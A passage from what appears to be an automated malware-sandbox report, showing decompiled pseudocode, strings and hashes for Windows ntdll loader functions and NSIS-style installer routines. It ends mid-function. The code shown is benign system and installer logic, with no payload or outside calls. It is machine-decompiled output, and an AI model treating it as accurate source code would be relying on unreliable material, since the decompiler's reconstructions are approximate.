                                                                                                    0x00000000
                                                                                                    0x00a988c9
                                                                                                    0x00a9887f
                                                                                                    0x00a9886a
                                                                                                    0x00a98857
                                                                                                    0x00a98852
                                                                                                    0x00a988bf
                                                                                                    0x00a988bf
                                                                                                    0x00a987aa
                                                                                                    0x00a987ad
                                                                                                    0x00a987ae
                                                                                                    0x00a987b4
                                                                                                    0x00a987b5
                                                                                                    0x00a987b6
                                                                                                    0x00a987b8
                                                                                                    0x00a987bd
                                                                                                    0x00a987c1
                                                                                                    0x00a987f4
                                                                                                    0x00a987fa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a987c1
                                                                                                    0x00000000

                                                                                                    Strings
                                                                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00AE9C18
                                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 00AE9C28
                                                                                                    • LdrpDoPostSnapWork, xrefs: 00AE9C1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                    • API String ID: 2994545307-1948996284
                                                                                                    • Opcode ID: 042724572164d50f1cbf31e9745c73b57806dcea21a7ba3086e272d8de17d3b8
                                                                                                    • Instruction ID: 2b9f2daad55f4b92be7682ca984828ca230185f6418118d9f2723ace291700e3
                                                                                                    • Opcode Fuzzy Hash: 042724572164d50f1cbf31e9745c73b57806dcea21a7ba3086e272d8de17d3b8
                                                                                                    • Instruction Fuzzy Hash: BC91D171B00216AFDF18DF59C881ABAB7F5FF46350B648169E805AB251DF34ED41CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A97E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 98%
                                                                                                    			E00A97E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00A9CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00A8C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xb75780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00B05510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xb75780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00AA7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00AA7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00B07016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00AA7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00AA7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00B07016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00ABA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00A8B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                    0x00a97e4c
                                                                                                    0x00a97e50
                                                                                                    0x00a97e55
                                                                                                    0x00a97e58
                                                                                                    0x00a97e5d
                                                                                                    0x00a97e71
                                                                                                    0x00a97f33
                                                                                                    0x00a97e77
                                                                                                    0x00a97e77
                                                                                                    0x00a97e79
                                                                                                    0x00a97e79
                                                                                                    0x00a97e7e
                                                                                                    0x00a97f45
                                                                                                    0x00ae9848
                                                                                                    0x00000000
                                                                                                    0x00ae9848
                                                                                                    0x00a97f4e
                                                                                                    0x00a97f53
                                                                                                    0x00a97f5a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae985a
                                                                                                    0x00ae9862
                                                                                                    0x00ae9866
                                                                                                    0x00000000
                                                                                                    0x00ae986c
                                                                                                    0x00000000
                                                                                                    0x00ae986c
                                                                                                    0x00a97e84
                                                                                                    0x00a97e84
                                                                                                    0x00a97e8d
                                                                                                    0x00ae9871
                                                                                                    0x00a97eb8
                                                                                                    0x00a97ec0
                                                                                                    0x00a97ec0
                                                                                                    0x00a97e9a
                                                                                                    0x00ae987e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae9884
                                                                                                    0x00ae988b
                                                                                                    0x00ae98a7
                                                                                                    0x00ae98ac
                                                                                                    0x00ae98b1
                                                                                                    0x00ae98b6
                                                                                                    0x00ae98b8
                                                                                                    0x00ae98b8
                                                                                                    0x00ae98b9
                                                                                                    0x00000000
                                                                                                    0x00ae98b9
                                                                                                    0x00a97ea0
                                                                                                    0x00a97ea7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a97eac
                                                                                                    0x00a97eb1
                                                                                                    0x00a97ec6
                                                                                                    0x00a97ed0
                                                                                                    0x00ae98cc
                                                                                                    0x00a97ed6
                                                                                                    0x00a97ed6
                                                                                                    0x00a97ed6
                                                                                                    0x00a97ede
                                                                                                    0x00a97ee3
                                                                                                    0x00ae98e3
                                                                                                    0x00ae98f0
                                                                                                    0x00ae9902
                                                                                                    0x00ae98f2
                                                                                                    0x00ae98fb
                                                                                                    0x00ae98fb
                                                                                                    0x00ae9907
                                                                                                    0x00ae991d
                                                                                                    0x00ae991d
                                                                                                    0x00ae9907
                                                                                                    0x00ae98e3
                                                                                                    0x00a97ef0
                                                                                                    0x00a97f14
                                                                                                    0x00a97f14
                                                                                                    0x00a97f1e
                                                                                                    0x00ae9946
                                                                                                    0x00a97f24
                                                                                                    0x00a97f24
                                                                                                    0x00a97f24
                                                                                                    0x00a97f2c
                                                                                                    0x00ae996a
                                                                                                    0x00ae9975
                                                                                                    0x00ae9975
                                                                                                    0x00ae997e
                                                                                                    0x00ae9993
                                                                                                    0x00ae9993
                                                                                                    0x00ae997e
                                                                                                    0x00000000
                                                                                                    0x00a97ef2
                                                                                                    0x00a97efc
                                                                                                    0x00a97f0a
                                                                                                    0x00a97f0e
                                                                                                    0x00ae9933
                                                                                                    0x00000000
                                                                                                    0x00ae9933
                                                                                                    0x00000000
                                                                                                    0x00a97f0e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a97eb1

                                                                                                    Strings
                                                                                                    • LdrpCompleteMapModule, xrefs: 00AE9898
                                                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 00AE9891
                                                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 00AE98A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                    • API String ID: 0-1676968949
                                                                                                    • Opcode ID: 479881d7b34b312e1f9c54a644914ae7fdf72068e7309bcad3752fe5b90e8ed5
                                                                                                    • Instruction ID: c20613253e39df8962ef550d304dfb2407b67aeac8ef6441f120fd64ccdeef69
                                                                                                    • Opcode Fuzzy Hash: 479881d7b34b312e1f9c54a644914ae7fdf72068e7309bcad3752fe5b90e8ed5
                                                                                                    • Instruction Fuzzy Hash: E251F031B187859BDB26CB69C944B6EBBF4AF01710F1406A9E8519B7E2D770ED00CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A8E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 93%
                                                                                                    			E00A8E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00A8F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00AC95D0();
						}
						if(_t78 != 0) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00ACFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00ACBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00AC9600();
					if(_t97 < 0) {
						goto L6;
					}
					E00ACBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00A8F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00ACBB40(_t83, _t102 + 0x24, _t78);
								if(L00A943C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00ACBB40(_t84, _t102 + 0x24, _t94);
									if(L00A943C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                    0x00a8e620
                                                                                                    0x00a8e628
                                                                                                    0x00a8e62f
                                                                                                    0x00a8e631
                                                                                                    0x00a8e635
                                                                                                    0x00a8e637
                                                                                                    0x00a8e63e
                                                                                                    0x00ae5503
                                                                                                    0x00ae5503
                                                                                                    0x00a8e64c
                                                                                                    0x00a8e64c
                                                                                                    0x00a8e651
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a8e661
                                                                                                    0x00a8e665
                                                                                                    0x00ae542a
                                                                                                    0x00a8e715
                                                                                                    0x00a8e71a
                                                                                                    0x00a8e71c
                                                                                                    0x00a8e720
                                                                                                    0x00a8e720
                                                                                                    0x00a8e727
                                                                                                    0x00a8e736
                                                                                                    0x00a8e736
                                                                                                    0x00a8e743
                                                                                                    0x00a8e743
                                                                                                    0x00a8e673
                                                                                                    0x00a8e678
                                                                                                    0x00a8e67d
                                                                                                    0x00a8e682
                                                                                                    0x00a8e685
                                                                                                    0x00a8e692
                                                                                                    0x00a8e69b
                                                                                                    0x00a8e6a3
                                                                                                    0x00a8e6ad
                                                                                                    0x00a8e6b1
                                                                                                    0x00a8e6b2
                                                                                                    0x00a8e6bb
                                                                                                    0x00a8e6bf
                                                                                                    0x00a8e6c0
                                                                                                    0x00a8e6c8
                                                                                                    0x00a8e6cc
                                                                                                    0x00a8e6d5
                                                                                                    0x00a8e6d9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a8e6e5
                                                                                                    0x00a8e6ea
                                                                                                    0x00a8e6f9
                                                                                                    0x00a8e70b
                                                                                                    0x00a8e70f
                                                                                                    0x00ae5439
                                                                                                    0x00ae545e
                                                                                                    0x00ae545e
                                                                                                    0x00000000
                                                                                                    0x00ae545e
                                                                                                    0x00ae543b
                                                                                                    0x00ae543e
                                                                                                    0x00ae5440
                                                                                                    0x00ae5445
                                                                                                    0x00ae5472
                                                                                                    0x00ae5475
                                                                                                    0x00ae548d
                                                                                                    0x00ae5493
                                                                                                    0x00ae54a9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae54ab
                                                                                                    0x00ae54b4
                                                                                                    0x00ae54bc
                                                                                                    0x00ae54c8
                                                                                                    0x00ae54de
                                                                                                    0x00ae54fb
                                                                                                    0x00ae54e0
                                                                                                    0x00ae54e6
                                                                                                    0x00ae54eb
                                                                                                    0x00ae54eb
                                                                                                    0x00ae54de
                                                                                                    0x00000000
                                                                                                    0x00ae54bc
                                                                                                    0x00ae5477
                                                                                                    0x00ae547a
                                                                                                    0x00ae5480
                                                                                                    0x00ae5483
                                                                                                    0x00ae5486
                                                                                                    0x00ae548b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae548b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae5447
                                                                                                    0x00ae5447
                                                                                                    0x00ae5447
                                                                                                    0x00ae5447
                                                                                                    0x00ae544e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae5450
                                                                                                    0x00ae5452
                                                                                                    0x00ae5455
                                                                                                    0x00ae545a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae545c
                                                                                                    0x00ae546a
                                                                                                    0x00ae546d
                                                                                                    0x00ae546f
                                                                                                    0x00000000
                                                                                                    0x00ae546f
                                                                                                    0x00a8e70f

                                                                                                    Strings
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00A8E68C
                                                                                                    • @, xrefs: 00A8E6C0
                                                                                                    • InstallLanguageFallback, xrefs: 00A8E6DB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                    • API String ID: 0-1757540487
                                                                                                    • Opcode ID: d26a600671cb330c3444b46361e8f7333366b5a9dd6fed5557f5589c5f85875a
                                                                                                    • Instruction ID: 6e486bcb970ecbc3a1b5226de8322daaac1865700c24af77bafb4a2b90b07e60
                                                                                                    • Opcode Fuzzy Hash: d26a600671cb330c3444b46361e8f7333366b5a9dd6fed5557f5589c5f85875a
                                                                                                    • Instruction Fuzzy Hash: 6B518E769083859BC714EF65D440AABB3E9BF88718F05092EF985D7280FB34DD44C7A2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B1FF10, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00B1FF60
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: DebugPrintTimes
                                                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                    • API String ID: 3446177414-1911121157
                                                                                                    • Opcode ID: 6b132d38d8fe7c7a5e8bf82327d74aab7cbe0ddc814b9c9982531f406b25e9f0
                                                                                                    • Instruction ID: 14c7511f023fc04995acf4ad1e0152f30453112e77addf7e5cfda0aa2be5f925
                                                                                                    • Opcode Fuzzy Hash: 6b132d38d8fe7c7a5e8bf82327d74aab7cbe0ddc814b9c9982531f406b25e9f0
                                                                                                    • Instruction Fuzzy Hash: 5111C475951544EFDB22DB50CD49FE877F1FF08704F548094F1096B2A2CB799981CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402020, Relevance: 3.1, APIs: 2, Instructions: 134comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 74%
                                                                                                    			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E004056C6(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, 0x429800);
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409368, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                                    0x00402029
                                                                                                    0x00402033
                                                                                                    0x0040203c
                                                                                                    0x00402046
                                                                                                    0x0040204f
                                                                                                    0x00402059
                                                                                                    0x0040205d
                                                                                                    0x0040205d
                                                                                                    0x00402062
                                                                                                    0x00402073
                                                                                                    0x0040207b
                                                                                                    0x0040215b
                                                                                                    0x0040215b
                                                                                                    0x00402162
                                                                                                    0x00402081
                                                                                                    0x00402081
                                                                                                    0x00402092
                                                                                                    0x00402096
                                                                                                    0x0040209c
                                                                                                    0x004020a6
                                                                                                    0x004020a8
                                                                                                    0x004020b3
                                                                                                    0x004020b6
                                                                                                    0x004020c3
                                                                                                    0x004020c5
                                                                                                    0x004020c7
                                                                                                    0x004020ce
                                                                                                    0x004020d1
                                                                                                    0x004020d1
                                                                                                    0x004020d4
                                                                                                    0x004020de
                                                                                                    0x004020e6
                                                                                                    0x004020eb
                                                                                                    0x004020f7
                                                                                                    0x004020f7
                                                                                                    0x004020fa
                                                                                                    0x00402103
                                                                                                    0x00402106
                                                                                                    0x0040210f
                                                                                                    0x00402114
                                                                                                    0x00402126
                                                                                                    0x00402135
                                                                                                    0x00402137
                                                                                                    0x00402143
                                                                                                    0x00402143
                                                                                                    0x00402135
                                                                                                    0x00402145
                                                                                                    0x0040214b
                                                                                                    0x0040214b
                                                                                                    0x0040214e
                                                                                                    0x00402154
                                                                                                    0x00402159
                                                                                                    0x0040216e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00402159
                                                                                                    0x00402164
                                                                                                    0x0040288e
                                                                                                    0x0040289a

                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 123533781-0
                                                                                                    • Opcode ID: adfaac76b9f80914bda58611a88ca7f4661468816f4769fa4d0f618f148a96e5
                                                                                                    • Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
                                                                                                    • Opcode Fuzzy Hash: adfaac76b9f80914bda58611a88ca7f4661468816f4769fa4d0f618f148a96e5
                                                                                                    • Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00405E61(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4224f0);
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4224f0;
			}




                                                                                                    0x00405e6c
                                                                                                    0x00405e75
                                                                                                    0x00000000
                                                                                                    0x00405e82
                                                                                                    0x00405e78
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,00007866,0040549F,?,00429000,00007866), ref: 00405E6C
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405E78
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                    • Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
                                                                                                    • Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                    • Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00ABFAB0, Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 80%
                                                                                                    			E00ABFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
